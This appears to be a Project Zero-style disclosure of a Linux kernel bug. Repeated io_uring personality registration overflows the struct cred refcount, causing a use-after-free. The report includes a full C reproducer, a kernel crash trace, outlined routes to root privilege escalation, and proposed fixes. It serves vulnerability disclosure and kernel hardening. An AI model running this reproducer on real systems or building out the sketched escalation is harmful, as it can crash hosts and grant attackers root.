Share
## https://sploitus.com/exploit?id=PACKETSTORM:189863
(see also my related prior bug reports about overflowing refcounts with lots
    of RAM usage:
    https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAM
    https://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)
    
    Since commit 071698e13ac6 ("io_uring: allow registering credentials"), landed
    in 5.6, it has been possible to grab references to struct cred very
    efficiently - by repeatedly calling the syscall
    io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0), it is possible
    to register up to 0xffff refcounted pointers to struct cred in an xarray
    (or in older kernel versions, in an IDR). These pointers can all be pointing
    to the same struct cred.
    By using a bunch of io_uring instances, that makes it possible to create a
    lot of refcounted references to struct cred at a very efficient and low
    amortized memory cost of less than 10 bytes per reference.
    
    struct cred is refcounted using the member atomic_t usage, which is a
    plain signed 32-bit atomic counter with no overflow checking.
    I believe there is some history here where Elena Reshetova and Kees Cook have
    been trying to turn it into a refcount_t, which would also fix this kind of
    issue by marking the refcount as "saturated" when it reaches 2^31 and then
    never freeing the object. Most recently there was this thread, where Kees
    tried to get that change in; there was some discussion, but I don't think
    anything has landed so far:
    https://lore.kernel.org/all/20230818041740.gonna.513-kees@kernel.org/
    
    So by using ~39 GiB of physical memory, it is possible to store 2^32
    references to struct cred and overflow the reference counter. That's not
    exactly a small amount of RAM, but I guess a lot of servers probably have that
    much RAM? At least cloud providers like AWS sell machines with much more RAM
    than that.
    
    I am including as recipients both akpm (who is the maintainer for
    kernel/cred.c and was involved in the linked discussion) and the io_uring
    maintainers (though io_uring, in my opinion, isn't really where the core issue
    here lies, but it happened to make it possible to hit this overflow using a
    fairly small amount of physical memory).
    Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested it
    in a VM so that the host machine could swap a bit):
    
    #define _GNU_SOURCE
    #include <pthread.h>
    #include <unistd.h>
    #include <err.h>
    #include <fcntl.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <ctype.h>
    #include <signal.h>
    #include <sys/syscall.h>
    #include <sys/wait.h>
    #include <sys/prctl.h>
    #include <sys/mman.h>
    #include <sys/resource.h>
    #include <sys/eventfd.h>
    #include <linux/io_uring.h>
    
    #define SYSCHK(x) ({ \
    typeof(x) __res = (x); \
    if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
    __res; \
    })
    
    // power of 2
    #define PARALLELISM 4
    
    static int efd;
    
    static void *thread_fn(void *dummy) {
    for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) {
    struct io_uring_params params = {
    .flags = IORING_SETUP_NO_SQARRAY
    };
    int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
    printf("uring_fd = 0x%x\n", (unsigned int)uring_fd);
    for (int i=0; i<0xffff; i++, refcount++)
    SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0));
    }
    printf("one thread ready\n");
    eventfd_write(efd, 1);
    while (1) pause();
    }
    
    int main(void) {
    setbuf(stdout, NULL);
    sync();
    
    struct rlimit rlim;
    SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
    if (rlim.rlim_max < 65550)
    printf("WARNING: RLIMIT_NOFILE maximum is probably too low\n");
    rlim.rlim_cur = rlim.rlim_max;
    SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));
    
    efd = SYSCHK(eventfd(0, 0));
    
    pthread_t threads[PARALLELISM];
    for (int i = 0; i < PARALLELISM; i++) {
    if (pthread_create(threads+i, NULL, thread_fn, NULL))
    errx(1, "pthread_create");
    }
    for (int i=0; i<4;) {
    eventfd_t val;
    SYSCHK(eventfd_read(efd, &val));
    i += val;
    }
    printf("refs should have wrapped. press ctrl+c for uaf on cleanup.\n");
    while (1)
    pause();
    }
    
    The reproducer takes a while to run; when it's done and the cred refcount has
    been wrapped, you can press ctrl+c to make the process exit, which will
    repeatedly decrement the cred refcount until the cred refcount reaches zero
    (when there are actually 2^32 references remaining).
    At that point, it'll hit the BUG_ON(cred == current->cred) check in
    __put_cred(), since the reproducer doesn't go out of its way to avoid this
    check:
    ============
    kernel BUG at kernel/cred.c:150!
    invalid opcode: 0000 [#1] PREEMPT SMP
    CPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
    RIP: 0010:__put_cred+0x55/0x60
    Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
    RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246
    RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94
    RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480
    RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007
    R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040
    R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938
    FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000
    CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0
    PKRU: 55555554
    Call Trace:
    <TASK>
    [...]
    io_ring_ctx_wait_and_kill+0xa8/0x180
    io_uring_release+0x20/0x30
    __fput+0x92/0x2c0
    task_work_run+0x5a/0x90
    do_exit+0x36c/0xbc0
    do_group_exit+0x37/0xa0
    get_signal+0xbcf/0xbd0
    arch_do_signal_or_restart+0x3e/0x270
    exit_to_user_mode_prepare+0xba/0x110
    syscall_exit_to_user_mode+0x21/0x50
    do_syscall_64+0x52/0xf0
    entry_SYSCALL_64_after_hwframe+0x6e/0x76
    RIP: 0033:0x7ff41d547d92
    Code: Unable to access opcode bytes at 0x7ff41d547d68.
    RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022
    RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92
    RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000
    RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040
    R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfff
    R13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000
    </TASK>
    Modules linked in:
    ---[ end trace 0000000000000000 ]---
    RIP: 0010:__put_cred+0x55/0x60
    Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
    RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246
    RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94
    RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480
    RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007
    R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040
    R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938
    FS: 0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000
    CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0
    PKRU: 55555554
    Fixing recursive fault but reboot is needed!
    
    A use-after-free of struct cred should be exploitable; one method would be
    to try to get the freed object allocated again as the struct cred of a
    root-privileged process, another method would be to try to reallocate the
    object with a buffer containing attacker-controlled data somehow (and then
    fake a full capability set in init_user_ns with UIDs set to zero).
    
    While one tempting easy fix here would be to close off avenues for getting
    lots of references with little RAM (like somehow making io_uring reuse IDs
    with a local usage counter when userspace tries to insert the same
    struct cred into the xarray multiple times), I think that this example shows
    how fragile that method is. It requires knowing about all the various
    reference paths that can hold references to struct cred, and what kinds of
    multipliers or global limits apply at every point in this reference graph.
    
    I think the kernel should be using some flavor of saturating refcounts as the
    default choice, at least on machines that have enough RAM to store 2^32
    pointers.
    If there are specific cases where the overhead is undesirable, I think we
    should only omit such a check if we can document exactly how many references
    can exist at most, with enough warning comments scattered around to ensure
    that the assumptions can't accidentally be broken inadvertently later on.
    
    (Or the kernel could limit SLUB to a maximum of 32 GiB of memory except for
    specially marked slabs that store objects guaranteed to not hold multiple
    references to the same object, but I think people would probably hate that
    idea.)
    
    (But note that refcount hardening also has value for protecting against bugs
    where some repeatedly executed codepath forgets to decrement the refcount,
    letting it drift up until it wraps around; and that kind of bug is also
    exploitable without using ginormous amounts of RAM.)
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this
    issue is made available to users before the end of the 90-day deadline,
    this bug report will become public 30 days after the fix was made
    available. Otherwise, this bug report will become public at the deadline.
    The scheduled deadline is 2024-02-26.
    
    
    Credit: Jann Horn